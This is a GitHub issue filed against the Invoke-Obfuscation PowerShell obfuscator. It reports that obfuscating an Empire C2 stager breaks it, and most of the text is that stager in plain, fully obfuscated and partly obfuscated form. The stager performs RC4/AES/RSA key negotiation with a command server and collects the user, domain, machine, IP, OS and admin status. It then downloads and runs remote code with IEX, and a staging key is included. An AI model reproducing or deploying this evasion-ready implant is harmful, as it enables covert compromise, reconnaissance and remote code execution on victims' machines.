search

danielbohannon / Invoke-Obfuscation

PowerShell Obfuscator
Apache License 2.0
3.62k stars 763 forks source link

Obfuscation causes script to not execute properly #13

Closed cobbr closed 6 years ago

cobbr commented 7 years ago

Problem

I discovered this issue while trying to obfuscate stagers produced by the Empire project.

When obfuscating the Empire stager, it no longer executes properly. I am able to correct this by disabling string TOKEN, member TOKEN levels 3 and 4, and command TOKEN obfuscation types. My hunch is that it all traces back to something in string TOKEN obfuscation.

Output

Here is the stager script prior to any obfuscation:

fUNcTiON STARt-NegoTIATe {parAm($s,$SK,$UA='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON COnverTTo-RC4BYtEStrEam {PaRaM ($RCK, $IN)BegIn {[BYTe[]] $S = 0..255;$J = 0;0..255 | FOREAcH-OBjecT {$J = ($J + $S[$_] + $RCK[$_ % $RCK.LeNGtH]) % 256;$S[$_], $S[$J] = $S[$J], $S[$_];};$I = $J = 0;}pRocEsS {ForEacH($BYTE in $IN) {$I = ($I + 1) % 256;$J = ($J + $S[$I]) % 256;$S[$I], $S[$J] = $S[$J], $S[$I];$BytE -BXOR $S[($S[$I] + $S[$J]) % 256];}}}FunctIoN DeCRypt-BYtes {Param ($KEY, $IN)IF($IN.LeNgTH -Gt 32) {$HMAC = NEw-ObJect SySTem.SeCURity.CryptoGRAPhY.HMACSHA256;$E=[SYStEm.TeXT.EncoDinG]::ASCII;$MAc = $In[-10..-1];$In = $IN[0..($In.LEngtH - 11)];$HMaC.Key = $e.GETBYteS($Key);$ExPeCted = $HmAC.ComPUTEHaSH($In)[0..9];IF (@(COMpARe-ObJect $MAC $ExpeCTed -SYnc 0).LeNGTH -nE 0) {rETURN;}$IV = $IN[0..15];$AES = NeW-OBJect SYstEm.SEcuRiTy.CrYPtoGRApHy.AEsCRYPTOSErVICEProViDEr;$AES.Mode = "CBC";$AES.KEY = $E.GETByTes($Key);$AES.IV = $IV;($AES.CREateDecrYPtor()).TrAnSfORmFInAlBlock(($IN[16..$In.LeNGTh]), 0, $In.LEngth-16)}}$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");$ErrorActionPreference = "SilentlyContinue";$E=[SYSTEm.TexT.ENcODIng]::ASCII;$customHeaders = "";$SKB=$E.GetByTES($SK);$AES=NEw-ObjECT System.SecURITY.CrYptography.AEsCrypToSerVicePROvider;$IV = [byTE] 0..255 | Get-RANDOM -cOUnt 16;$AES.Mode="CBC";$AES.KEy=$SKB;$AES.IV = $IV;$HmAc = New-ObJECT SYStEm.SecurITY.CrYpTOGRAphy.HMACSHA256;$HMaC.Key = $SKB;$CsP = NEW-OBjECt System.SeCuRITY.CrYptoGRAphy.CspParamEtErs;$CSP.FlAGs = $CSP.FlagS -BOR [SysTEm.SecuRity.CrypToGrAPhY.CspPRovIDerFLaGS]::UsEMAchineKEYStOrE;$Rs = NeW-OBjECT SYsTeM.SECURITY.CrYpTogRAPHY.RSACRyPTOSErvicEPROvider -ARGUMentLIST 2048,$CSP;$rk=$rS.TOXmlSTrING($FalsE);$ID=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789".ToCharArray()|Get-Random -Count 8);$ib=$E.getBytES($Rk);$EB=$IV+$AES.CrEAteENcrypTor().TRAnsFORMFInALBlocK($IB,0,$iB.LeNgth);$eb=$eb+$Hmac.ComPUTEHAsh($Eb)[0..9];if(-NoT $WC) {$wC=NeW-OBjeCt SYSTEM.NEt.WebCliEnt;$WC.PRoxy = [SySTEm.NEt.WEBREQUESt]::GetSysTemWEbProXY();$wc.PRoXy.CrEdentIalS = [SYStEM.NeT.CREDentiAlCAChe]::DefaULTCREDENtials;}if ($customHeaders -ne "") {$HEaDeRS = $cUStoMHEaDERS -SpLIt ',';$HeaDeRs | FOREACH-OBjEcT {$HeAdeRKEY = $_.SPLIt(':')[0];$hEaDerVaLuE = $_.Split(':')[1];$wc.HEaDErS.Add($hEaderKEY, $heaDErVALUE);}}$wc.Headers.Add("User-Agent",$UA);$IV=[BitConVErTEr]::GeTBytES($(GeT-RandOm));$daTA = $E.GetbYtEs($ID) + @(0X01,0x02,0X00,0X00) + [BItCONveRteR]::GEtBYtEs($EB.LeNGTH);$Rc4p = CONVertTO-RC4BYTeStrEam -RCK $($IV+$SKB) -IN $Data;$Rc4p = $IV + $rC4p + $Eb;$raw=$wc.UploadData($s+"/news.php","POST",$rc4p);$De=$E.GEtSTrInG($Rs.DEcRYPt($RAw,$FALSE));$noNCE=$De[0..15] -JOiN '';$kEy=$DE[16..$de.LeNgth] -JoIn '';$noNCE=[String]([LONG]$nOnCE + 1);$AES=NEw-ObjeCt SYSTEM.SEcuRITY.CRypTogrApHy.AEsCrypToSERvIcePRovIDeR;$IV = [BYtE] 0..255 | Get-RANdOM -COuNT 16;$AES.Mode="CBC";$AES.Key=$E.GeTByTes($KeY);$AES.IV = $IV;$I=$NOnCe+'|'+$s+'|'+[EnviroNmeNT]::UsERDoMaiNNamE+'|'+[EnVIrONMEnt]::UsErNAme+'|'+[EnvirOnmeNT]::MachiNeNamE;$p=(gwMi WIN32_NeTWORKAdapTERConfIGuraTioN|WHeRE{$_.IPAdDrEsS}|SeLECT -ExPAnD IPADDReSS);$Ip = @{$tRue=$p[0];$fALSE=$P}[$P.LEnGTH -Lt 6];iF(!$IP -or $Ip.TrIM() -Eq '') {$ip='0.0.0.0'};$i+="|$ip";$I+='|'+(GeT-WMIObjECT WiN32_OpeRATInGSystem).Name.SpLit('|')[0];if(([Environment]::UserName).ToLower() -eq "system"){$i+="|True"}else {$i += '|' +([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")}$N=[SYstEM.DIagnoSTIcs.PrOCesS]::GeTCUrrEntPROCESs();$i+='|'+$n.PRocESsNAme+'|'+$n.ID;$i += "|powershell|" + $PSVersionTable.PSVersion.Major;$ib2=$E.GetbYTES($I);$Eb2=$IV+$AES.CreateEncrYPtOR().TrANsforMFinAlBLoCK($Ib2,0,$Ib2.LengtH);$hMAC.KEy = $E.GEtBYtEs($kEY);$eb2 = $eB2+$hmac.CoMpuTEHAsH($EB2)[0..9];$IV2=[BItConvErteR]::GETByTes($(Get-RaNDOM));$daTa2 = $e.gEtBYTES($ID) + @(0x01,0X03,0x00,0x00) + [BITCOnVErTer]::GEtBYTES($EB2.LeNgth);$Rc4p2 = CoNvERTTO-RC4BYTEStrEam -RCK $($IV2+$SKB) -IN $daTA2;$rC4P2 = $IV2 + $rC4p2 + $EB2;if ($customHeaders -ne "") {$heADeRs = $cUsTomHEadErS -SpLIT ',';$hEadeRS | ForEAcH-ObJECT {$HEaDeRKEY = $_.SPLiT(':')[0];$heaDeRVAlUE = $_.sPLIT(':')[1];$wC.HeADERs.ADD($HEADerKey, $HeaDerVALue);}}$wc.Headers.Add("User-Agent",$UA);$raw=$wc.UploadData($s+"/login/process.php","POST",$rc4p2);IEX $( $e.GETStRINg($(DECRYpT-BYTes -KEy $Key -In $raW)) );$AES=$nuLL;$S2=$nULl;$wc=$nUlL;$EB2=$nuLL;$raW=$NUll;$IV=$Null;$wc=$nUlL;$i=$NuLl;$Ib2=$NULL;[GC]::COLLeCt();Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID;}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA $u;

This is the script post-obfuscation:

  .("{0}{2}{1}" -f 'SE','iTeM','t-')  ("VARiaBL"+"e:0F"+"4G"+"v5") ([tyPE]("{3}{2}{1}{0}{4}"-F '.aS','cTiOn','Fle','Re','semBly')  )  ;  .("{0}{2}{1}" -f 'S','ITeM','eT-')  ("vARia"+"B"+"Le:"+"UR2H"+"cI")  (  [typE]("{5}{0}{3}{1}{4}{2}"-f 'E','O','ng','NC','DI','SysTEm.tExt.')) ;  $01aW  = [tYPE]("{0}{9}{10}{7}{8}{3}{4}{6}{1}{5}{2}"-f'SYsT','O','Rflags','A','p','VidE','HY.cspPr','Y.Cr','YpTOGr','em.se','curiT'); .("{2}{1}{0}" -f 'M','ITe','sEt-') ("vaRIAbl"+"e:9"+"d"+"2o"+"4")  ([TYpe]("{1}{2}{0}{4}{3}" -f'br','SYstem.NE','T.WE','Uest','EQ') )  ;  &('sv')  ("{1}{0}" -f'jg0','H') ([tYPe]("{3}{7}{5}{0}{2}{6}{1}{4}" -F'.','NTIaLca','N','sy','CHe','TEm','et.CREde','S') );  &('SV') ('l3vo'+'jy') ([type]("{2}{0}{1}"-F'rOnm','enT','enVI') );  .("{0}{1}"-f 'Set-IT','Em') ("VARi"+"abl"+"E:15Ju"+"0h")  (  [TypE]("{5}{2}{4}{7}{1}{8}{0}{3}{6}" -F'oW','p','u','sIDE','r','SEc','Ntity','ity.PRinci','Al.wind') ) ;  &("{1}{0}{3}{2}"-f '-vA','sEt','e','RIAbL') ('Aopkq'+'U') (  [tYpE]("{2}{0}{3}{4}{1}"-F'STEM.DIAGNo','ESs','sY','StICS.p','RoC')  ); &('sV') ('dM0o'+'8J')  ( [tYpe]("{0}{2}{1}"-F'biT','nveRtER','co')  )  ;  $t9j5= [tYPe]('GC') ; fUnCtiON START`-`NeGO`Ti`Ate {pArAm(${S},${Sk},${uA}=("{3}{2}{6}{11}{1}{9}{7}{8}{10}{0}{5}{12}{4}"-f'; ','nDows NT ','oZIlLA/','M',' GeCKo','r','5.','1; W','OW64; TrI','6.','DENt/7.0','0 (WI','V:11.0) LiKe'))fUNctiON C`oN`Ve`RtTo-rC`4B`ytEs`TrEAm {PaRaM (${R`CK}, ${i`N})begIN {[BytE[]] ${s} = 0..255;${J} = 0;0..255 | .("{0}{1}{3}{2}"-f'FoRE','aCH','ct','-OBje') {${J} = (${j} + ${s}[${_}] + ${R`cK}[${_} % ${R`CK}."l`eNg`TH"]) % 256;${S}[${_}], ${s}[${J}] = ${S}[${J}], ${S}[${_}];};${i} = ${j} = 0;}pROcEsS {FOREACh(${bY`Te} in ${in}) {${I} = (${i} + 1) % 256;${J} = (${j} + ${s}[${i}]) % 256;${s}[${I}], ${S}[${J}] = ${s}[${J}], ${s}[${i}];${by`Te} -Bxor ${S}[(${s}[${i}] + ${s}[${J}]) % 256];}}}fUnCtIOn decr`Ypt-b`Y`Tes {PaRam (${K`ey}, ${In})if(${I`N}."leNG`Th" -Gt 32) {${H`Mac} = &("{2}{1}{0}"-f 't','-ObjeC','New') ("{0}{7}{5}{4}{8}{2}{1}{3}{6}" -f'Sy','S','PHy.HMAC','H','RypTOG','C','A256','StEm.SEcurITY.','ra');${E}=  ( &("{0}{1}"-f'G','ci') ('vAriabLe:'+'Ur'+'2'+'hci')  )."v`AluE"::"As`cii";${m`Ac} = ${I`N}[-10..-1];${i`N} = ${In}[0..(${IN}."len`GTh" - 11)];${h`MAC}."K`ey" = ${E}.("{1}{0}"-f's','GEtBYtE').Invoke(${K`ey});${eX`pEc`TeD} = ${Hm`AC}.("{2}{0}{1}" -f 'MPUTE','HAsH','CO').Invoke(${iN})[0..9];if (@(.("{3}{0}{2}{1}"-f'Pa','T','Re-OBJEc','COm') ${m`AC} ${Exp`e`CtEd} -SYNC 0)."LEn`g`TH" -ne 0) {rEturN;}${i`V} = ${In}[0..15];${A`ES} = .("{0}{1}{2}" -f 'NEw-Ob','Je','CT') ("{8}{10}{11}{0}{6}{2}{14}{5}{1}{13}{4}{7}{9}{12}{3}"-f'I','y','y','vIDEr','RapHy.AESCrypT','R','t','O','SYsT','SerVIC','eM','.SEcUr','EPrO','ptog','.C');${A`eS}."m`odE" = "CBC";${A`eS}."k`eY" = ${e}.("{0}{2}{1}"-f 'Get','es','ByT').Invoke(${K`ey});${A`Es}."Iv" = ${I`V};(${A`ES}.("{1}{0}{2}{3}" -f 'EATe','Cr','DEcRYP','TOR').Invoke())."tR`AN`SFOrmfInalbl`O`cK"((${iN}[16..${i`N}."lE`NGTH"]), 0, ${in}."le`NgTH"-16)}}${Nu`lL} =  $0F4Gv5::("{3}{2}{4}{1}{0}{5}"-f'Na','tial','thP','LoadWi','ar','me').Invoke(("{0}{1}{2}"-f 'S','ystem.Secur','ity'));${nU`LL} =   (  &("{2}{0}{3}{1}" -f 'ARIAb','e','get-v','L') ('0f4GV'+'5')  -VAluEO )::("{1}{4}{0}{3}{2}" -f'a','LoadWit','alName','rti','hP').Invoke(("{2}{1}{3}{0}"-f'ore','stem','Sy','.C'));${erroRAcTi`O`NPr`efER`EncE} = ("{1}{3}{0}{2}{4}"-f 'C','Si','ont','lently','inue');${E}=  (  .("{1}{0}" -f'EM','it')  ("VarIa"+"b"+"LE:"+"uR2h"+"Ci")  )."V`ALUE"::"aSc`iI";${c`U`sToM`HE`AdErS} = "";${S`kb}=${e}.("{0}{1}" -f'G','etBYTeS').Invoke(${S`k});${A`ES}=&("{0}{1}{3}{2}"-f'N','eW-','EcT','OBj') ("{0}{6}{9}{10}{2}{1}{5}{4}{7}{8}{3}" -f 'S','Pto','ry','R','Ovi','SErvICEPR','YSTEm.SeCuRI','D','e','ty.CryPtogRAp','Hy.AeSC');${I`V} = [Byte] 0..255 | .("{2}{1}{0}" -f'om','AnD','GeT-R') -COunT 16;${A`ES}."Mo`De"="CBC";${A`Es}."K`eY"=${S`kB};${A`es}."I`V" = ${i`V};${hM`AC} = &("{2}{1}{0}" -f 'JeCt','B','New-O') ("{1}{6}{9}{2}{8}{3}{0}{4}{10}{5}{7}{11}"-f'Ty.CR','S','.Se','uRi','Yptogr','y.HMA','yS','CSH','C','tEM','aph','A256');${HM`Ac}."k`ey" = ${S`KB};${c`Sp} = &("{0}{1}{2}{3}"-f 'NE','w','-Obje','ct') ("{2}{0}{5}{4}{1}{3}{6}" -f 'sTEm.S','CSPPARame','Sy','tEr','APhY.','ECUrity.CRyPTOgr','s');${C`sp}."fLa`gs" = ${C`SP}."FL`Ags" -Bor  (.("{2}{0}{1}"-f 'iABl','E','VAR')  ("{0}{1}"-f '0','1AW') )."v`ALUe"::"USE`maC`Hi`N`EKEYsTORe";${Rs} = .("{2}{0}{1}"-f 'W-O','BjeCT','Ne') ("{15}{9}{14}{10}{7}{6}{8}{12}{5}{3}{11}{0}{4}{1}{13}{2}"-f'O','OViD','r','RY','SERVIcEPR','Y.RSAC','RiTY','u','.CryP','Em.','C','pT','TOgrAPh','e','SE','SYsT') -ARGuMeNtLISt 2048,${C`sp};${R`K}=${r`S}.("{1}{0}{3}{2}"-f 'Tri','TOXmLS','g','n').Invoke(${fa`lsE});${I`D}=-join(("{0}{5}{8}{7}{3}{9}{1}{2}{4}{6}"-f 'AB','12','3456','ST','7','CD','89','NPR','EFGHKLM','UVWXYZ').("{0}{2}{3}{1}"-f'T','rray','oC','harA').Invoke()|.("{0}{2}{1}" -f 'Get-Ran','m','do') -Count 8);${i`B}=${E}.("{1}{2}{0}"-f'S','GET','byTe').Invoke(${r`k});${e`B}=${i`V}+${a`ES}.("{1}{0}{2}{3}"-f'eATEENcRy','Cr','Pt','OR').Invoke().("{4}{3}{1}{5}{0}{2}" -f'OC','rMFInALB','K','ANsFo','TR','l').Invoke(${i`B},0,${i`B}."LENG`TH");${eb}=${e`B}+${hM`Ac}.("{2}{0}{3}{1}"-f'MP','H','CO','UTeHAS').Invoke(${e`B})[0..9];If(-Not ${WC}) {${w`C}=&("{1}{2}{0}"-f'cT','Ne','W-ObJE') ("{2}{1}{0}{3}" -f'.Ne','Em','SysT','t.WEbCLienT');${w`c}."PrO`xy" =   (  .("{1}{0}" -f'r','Di') ("VariAbL"+"E:9"+"D"+"2o"+"4"))."V`ALUE"::("{1}{2}{3}{0}{4}" -f 'WEBPR','GE','TSYSTE','m','OXY').Invoke();${w`c}."prO`Xy"."cr`e`DENTi`ALS" =   (  &("{1}{0}" -f 'cI','g') ("{1}{0}{3}{2}" -f 'aRiAbL','v','Hjg0','E:') )."V`AluE"::"D`efa`ul`TCREDeNtiA`ls";}if (${Cu`StoM`Head`eRS} -ne "") {${hE`AdErS} = ${cu`St`OMHeA`DERS} -split ',';${hE`Ad`erS} | &("{2}{4}{3}{1}{0}"-f 't','bjEC','FOREaC','-O','h') {${hE`A`DERKeY} = ${_}.("{1}{0}" -f 'pLIT','S').Invoke(':')[0];${h`EaDErva`lUE} = ${_}.("{1}{0}"-f 't','splI').Invoke(':')[1];${W`C}."H`EADE`RS".("{1}{0}"-f 'd','AD').Invoke(${h`eAdeR`kEY}, ${hE`ADERVA`L`ue});}}${w`c}."HE`ADeRS".("{1}{0}" -f 'dd','A').Invoke(("{2}{1}{0}"-f 'nt','ge','User-A'),${uA});${iv}=  (&("{0}{1}"-f'GC','I')  ('VaRI'+'ABle'+':Dm0o'+'8j'))."vaL`Ue"::("{1}{2}{0}" -f 'ES','GetBY','T').Invoke($(&("{0}{1}{2}"-f'GEt-','R','aNdom')));${DA`Ta} = ${E}.("{2}{1}{0}" -f 's','etBytE','g').Invoke(${I`d}) + @(0x01,0x02,0X00,0x00) +   $dm0O8J::("{1}{2}{0}"-f 's','GeT','BYtE').Invoke(${EB}."LEnG`TH");${R`c4P} = .("{1}{3}{0}{4}{2}"-f'ytES','CoNVERtTo-R','M','C4B','trEa') -RCK $(${Iv}+${s`kb}) -IN ${da`TA};${R`c4p} = ${iV} + ${rC`4p} + ${eb};${R`AW}=${wc}.("{1}{0}{2}" -f 'loadDat','Up','a').Invoke(${s}+("{2}{1}{0}{3}"-f't','admin/ge','/','.php'),("{0}{1}" -f'P','OST'),${rC`4p});${DE}=${e}.("{0}{2}{1}" -f 'GEt','inG','STR').Invoke(${r`S}.("{0}{1}" -f'D','EcrypT').Invoke(${r`AW},${F`AlSE}));${n`O`NCE}=${d`E}[0..15] -JoiN '';${k`EY}=${D`E}[16..${DE}."LeNg`TH"] -jOin '';${nOn`cE}=[StRiNg]([lonG]${N`O`NcE} + 1);${A`ES}=&("{1}{0}{2}" -f'EW-O','N','BJECt') ("{11}{0}{6}{8}{3}{4}{5}{2}{7}{9}{10}{1}" -f 'Tem','oVIDeR','Ser','Ity.CryPtOgraPHy.AeS','C','ryptO','.','v','SEcur','i','CEPr','SYS');${IV} = [ByTE] 0..255 | .("{0}{2}{1}" -f 'GeT-RA','dOM','N') -CoUNt 16;${a`es}."mO`De"="CBC";${A`ES}."k`ey"=${E}.("{2}{0}{1}" -f 'Byte','s','GET').Invoke(${K`Ey});${A`es}."iv" = ${IV};${I}=${nOn`cE}+'|'+${s}+'|'+ $l3VojY::"U`SERD`omAi`NNaMe"+'|'+ $L3vOjy::"UsER`NaME"+'|'+  (.("{0}{2}{1}"-f 'VARIab','e','l')  ("{1}{0}{2}" -f'v','l3','oJY') -VaL )::"m`ACHiNenA`me";${P}=(&("{1}{0}"-f'mI','gw') ("{9}{2}{7}{0}{6}{5}{1}{8}{3}{4}"-f'or','g','N','rATI','On','OnfI','KAdapteRC','32_Netw','u','WI')|&("{1}{0}" -f'HEre','W'){${_}."IPA`Ddr`Ess"}|&("{1}{0}{2}"-f'e','S','lect') -EXpand ("{0}{2}{1}"-f 'IPAd','REss','D'));${I`p} = @{${Tr`uE}=${p}[0];${F`AlsE}=${p}}[${p}."l`ength" -lT 6];if(!${I`p} -or ${I`P}.("{1}{0}"-f 'iM','tR').Invoke() -Eq '') {${I`p}=("{0}{1}" -f '0.0.0','.0')};${I}+="|$ip";${i}+='|'+(.("{1}{3}{0}{2}" -f'bjE','GeT-WM','cT','iO') ("{5}{4}{0}{3}{1}{2}"-f 'Ng','y','sTEm','S','ATi','Win32_OpEr'))."na`ME".("{0}{1}" -f'S','pLIt').Invoke('|')[0];if(( $l3vojy::"USe`Rn`AME").("{1}{0}" -f 'r','ToLowe').Invoke() -eq ("{2}{0}{1}" -f 'y','stem','s')){${i}+=(('n48True')  -CRepLACe ([CHAR]110+[CHAR]52+[CHAR]56),[CHAR]124)}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   $15JU0H::("{1}{2}{3}{0}"-f'rrent','Get','C','u').Invoke())."isiNr`o`le"([Security.Principal.WindowsBuiltInRole] ("{3}{1}{0}{2}"-f 'nistrat','dmi','or','A'))}${N}=  $AoPkqu::("{3}{0}{1}{2}"-f'U','RRENtPrOce','sS','GeTC').Invoke();${I}+='|'+${n}."PROC`e`Ssn`Ame"+'|'+${n}."Id";${I} += (("{4}{2}{0}{1}{3}"-f'h','e','owers','llJxY','JxYp'))."r`EpL`ACE"(([ChAr]74+[ChAr]120+[ChAr]89),[StRIng][ChAr]124) + ${P`s`VER`SionTAbLe}."Psver`s`ION"."M`AjoR";${I`B2}=${e}.("{2}{1}{0}"-f's','ETByTE','g').Invoke(${I});${e`B2}=${i`V}+${a`es}.("{0}{2}{3}{4}{1}"-f'Creat','pTor','eENC','R','y').Invoke().("{0}{3}{4}{1}{2}"-f'T','A','LBLoCK','RA','NsformFIn').Invoke(${I`B2},0,${i`B2}."Le`Ngth");${H`maC}."k`Ey" = ${E}.("{1}{2}{0}" -f'S','GeTByt','e').Invoke(${K`ey});${E`B2} = ${E`B2}+${h`MAC}.("{1}{0}{2}{3}" -f 'p','COm','UTEHA','SH').Invoke(${e`B2})[0..9];${I`V2}= ( &('gi')  ("{3}{2}{0}{4}{1}"-f 'Le','8j','B','vAria',':dm0o')  )."vA`LUe"::("{1}{0}{2}" -f 'TBYtE','GE','S').Invoke($(.("{3}{2}{0}{1}" -f'Do','m','N','GET-RA')));${Da`T`A2} = ${E}.("{0}{1}" -f'GeTbyt','ES').Invoke(${I`D}) + @(0x01,0x03,0x00,0x00) +   ( &("{1}{0}"-f 'Le','VarIAB')  ('dm0o'+'8J')  )."va`luE"::("{0}{2}{1}"-f 'GeTBy','eS','T').Invoke(${E`B2}."lEn`G`TH");${R`c4P2} = .("{4}{1}{2}{3}{6}{0}{5}" -f '-RC4BYTESt','o','nvER','T','C','reaM','To') -RCK $(${i`V2}+${S`kb}) -IN ${d`A`TA2};${R`c4`P2} = ${i`V2} + ${R`c4p2} + ${E`B2};if (${Cus`TomHe`Aders} -ne "") {${he`ADeRs} = ${C`UsT`Om`HEAdERS} -SplIT ',';${H`eAde`RS} | &("{1}{4}{2}{0}{3}"-f 'J','FOr','-OB','ECT','EACh') {${he`Ad`eRkeY} = ${_}.("{1}{0}"-f 'LIT','SP').Invoke(':')[0];${H`EaDer`ValUe} = ${_}.("{0}{1}" -f 's','PLit').Invoke(':')[1];${wC}."hEa`deRs".("{1}{0}" -f'd','Ad').Invoke(${hEADer`K`ey}, ${hEADe`RV`ALue});}}${wC}."HE`ADe`Rs".("{0}{1}" -f 'Ad','d').Invoke(("{2}{0}{1}"-f'gen','t','User-A'),${u`A});${R`Aw}=${W`c}.("{1}{0}{2}{3}" -f'lo','Up','adD','ata').Invoke(${S}+("{1}{0}"-f'news.php','/'),("{0}{1}" -f 'PO','ST'),${r`C`4p2});.("{1}{0}"-f 'X','IE') $( ${e}.("{3}{1}{0}{2}"-f 'Str','ET','Ing','G').Invoke($(.("{2}{3}{1}{0}" -f'Es','T','DEcRY','pT-BY') -KEY ${k`Ey} -In ${R`AW})) );${a`ES}=${N`uLl};${s2}=${NU`Ll};${W`C}=${Nu`lL};${e`B2}=${n`Ull};${R`Aw}=${nU`Ll};${Iv}=${NU`lL};${W`c}=${NU`lL};${I}=${n`ull};${i`B2}=${Nu`LL}; (&("{0}{1}" -f'd','Ir')  ('va'+'RIAB'+'Le:t9'+'J'+'5'))."VA`LUE"::("{1}{0}" -f 'olLEcT','C').Invoke();&("{1}{2}{3}{0}" -f'e','Invoke-E','m','pir') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${sK} -SessionKey ${K`Ey} -SessionID ${iD};}&("{4}{1}{3}{0}{2}" -f'go','art','tiate','-Ne','St') -s "$ser" -SK ("{0}{8}{2}{1}{7}{6}{3}{4}{5}" -f'3c6e0b8a9c15','a','28b9','15','3','1d','ca','98','224a82') -UA ${u};

Additionally, here is a copy of the working script post-obfuscation after disabling the obfuscation types mentioned above. Maybe there is a difference between this one and the normal post-obfuscation script you will be able to detect:

set-ItEM  ('v'+'arIab'+'le:9ernQ'+'0')  ( [TYpe]("{1}{5}{3}{0}{2}{6}{4}" -F'ctI','R','ON.Asse','FlE','ly','E','Mb')) ;  seT-vArIaBle  ("{0}{1}"-f'j','N4Ba') ([tyPE]("{3}{1}{0}{2}" -F'ExT.eNcODI','eM.t','Ng','SYSt') )  ;  SET ("{1}{0}" -f 'Z','O8Lb') ( [tYPE]("{3}{8}{4}{7}{6}{0}{2}{1}{9}{5}" -F 'oGR','y.CSPPr','apH','SYsTEm.se','Y.','S','RypT','c','CUriT','ovIdeRFlAG') )  ;sEt-vARiablE  ("{0}{1}" -f'3E1','S') (  [tyPe]("{0}{1}{3}{2}{4}" -f 'SyStEM.N','ET','web','.','REqueST') ) ; ${9`Px} =  [typE]("{3}{1}{0}{4}{2}"-f're','TEM.nET.c','EnTiALcaCHE','sys','d')  ;  sET-VariabLe ("{0}{1}"-f '2','kU9AV') (  [TyPE]("{1}{2}{0}" -F 'nMeNT','EN','vIRo'))  ; SEt-ITeM ("{2}{0}{1}" -f'iaBLE:52F','6Z4','VaR')  ( [tYpE]("{8}{9}{1}{3}{0}{4}{5}{10}{7}{2}{6}"-f 'W','.','Tit','PrInCipal.','INdoW','si','Y','N','seCuR','Ity','De')  )  ;  sET-iTEM  ('va'+'rI'+'ABle:R'+'SJ') ( [tYpE]("{0}{2}{4}{3}{1}{6}{5}"-f's','DIaGNo','ys','.','tEM','CESs','StiCs.pRO')  ) ;  set-iTeM ("vARiablE"+":H4"+"Y"+"sF")  ( [type]("{0}{3}{2}{1}" -F'BI','ER','t','TCONveR')  ) ;   Sv ("{0}{1}"-f 'JC0','A')  ( [tYpe]('gc')  )  ;fUNcTiON sTarT`-`Ne`Go`TIATE {parAm(${s},${S`k},${U`A}='MoZilLA/5.0 (WIndOWS NT 6.1; WOW64; TrIDeNt/7.0; rv:11.0) LiKe GEcKo')FUnCTiON convE`Rtt`O-`Rc4b`yT`EsTre`AM {PaRaM (${r`cK}, ${IN})BegIn {[BYTe[]] ${S} = 0..255;${j} = 0;0..255 | FOREAcH-OBjecT {${J} = (${j} + ${s}[${_}] + ${r`cK}[${_} % ${r`Ck}."LeN`g`TH"]) % 256;${s}[${_}], ${S}[${J}] = ${S}[${J}], ${s}[${_}];};${I} = ${j} = 0;}pRocEsS {ForEacH(${BY`Te} in ${I`N}) {${i} = (${I} + 1) % 256;${J} = (${j} + ${S}[${i}]) % 256;${s}[${i}], ${S}[${j}] = ${s}[${J}], ${S}[${i}];${By`Te} -BXOR ${S}[(${S}[${i}] + ${S}[${j}]) % 256];}}}FunctIoN dEcryp`T-`BytES {Param (${K`ey}, ${IN})IF(${i`N}."LENG`TH" -Gt 32) {${hM`AC} = NEw-ObJect ("{3}{10}{4}{0}{8}{1}{2}{9}{5}{7}{11}{6}" -f'eC','Rity.CryptoGRAP','h','Sy','em.S','.HM','6','A','U','Y','ST','CSHA25');${E}= (  GeT-VARIAblE ("{0}{1}"-f'jn','4Ba')  )."Va`lUe"::"as`CiI";${m`Ac} = ${I`N}[-10..-1];${I`N} = ${I`N}[0..(${IN}."LeNg`Th" - 11)];${hm`Ac}."K`EY" = ${e}."g`e`TbYtES"(${k`EY});${exPec`T`eD} = ${HM`Ac}."cOMPu`T`EHASh"(${i`N})[0..9];IF (@(COMpARe-ObJect ${m`Ac} ${E`XPE`cTED} -SYnc 0)."lE`Ngth" -nE 0) {rETURN;}${I`V} = ${In}[0..15];${a`es} = NeW-OBJect ("{6}{10}{12}{5}{2}{11}{1}{9}{7}{8}{0}{4}{3}"-f'E','.AEsC','Ty.CrYP','iDEr','ProV','Ri','SYs','OSErV','IC','RYPT','tEm','toGRApHy','.SEcu');${a`Es}."m`oDe" = "CBC";${A`ES}."K`eY" = ${E}."gEt`B`YTeS"(${K`EY});${a`es}."I`V" = ${I`V};(${a`Es}."creat`e`DE`CRYpTOR"())."traNsFor`mF`InALBL`OCK"((${IN}[16..${in}."LEN`G`Th"]), 0, ${i`N}."LEng`Th"-16)}}${n`ULl} =   ( gEt-item  ("{2}{0}{3}{1}" -f 'BLe','Ernq0','varIA',':9'))."Val`ue"::"l`oaDWithPa`R`TIaLn`A`mE"("System.Security");${n`uLl} =   ${9eR`N`Q0}::"Lo`A`dwItHp`A`RtiAlN`AMe"("System.Core");${ERroraC`Ti`o`NPr`e`FErENce} = "SilentlyContinue";${E}=  ( varIable ("{0}{1}" -f 'JN4b','A') )."V`AluE"::"a`sCIi";${cu`STOm`H`eA`DERs} = "";${S`kb}=${e}."GE`TBY`TES"(${S`k});${a`ES}=NEw-ObjECT ("{4}{12}{15}{10}{7}{1}{8}{13}{11}{6}{3}{9}{2}{14}{0}{5}"-f 'd','r','ceP','V','Sy','er','ToSer','Y.C','Yptography.AEs','i','cURIT','p','st','Cry','ROvi','em.Se');${I`V} = [byTE] 0..255 | Get-RANDOM -cOUnt 16;${A`ES}."m`ODe"="CBC";${a`ES}."K`Ey"=${s`Kb};${a`eS}."iV" = ${Iv};${hM`Ac} = New-ObJECT ("{3}{2}{5}{7}{0}{6}{4}{1}"-f 'pT','CSHA256','YS','S','Aphy.HMA','tEm.S','OGR','ecurITY.CrY');${hM`AC}."K`Ey" = ${s`kb};${c`sP} = NEW-OBjECt ("{1}{7}{3}{0}{2}{5}{6}{4}{8}"-f'TY.Cr','Sy','Y','em.SeCuRI','Csp','p','toGRAphy.','st','ParamEtErs');${c`SP}."f`LaGs" = ${C`SP}."f`lagS" -BOR   (gET-vAriable  ("{0}{1}" -f'o8','Lbz')  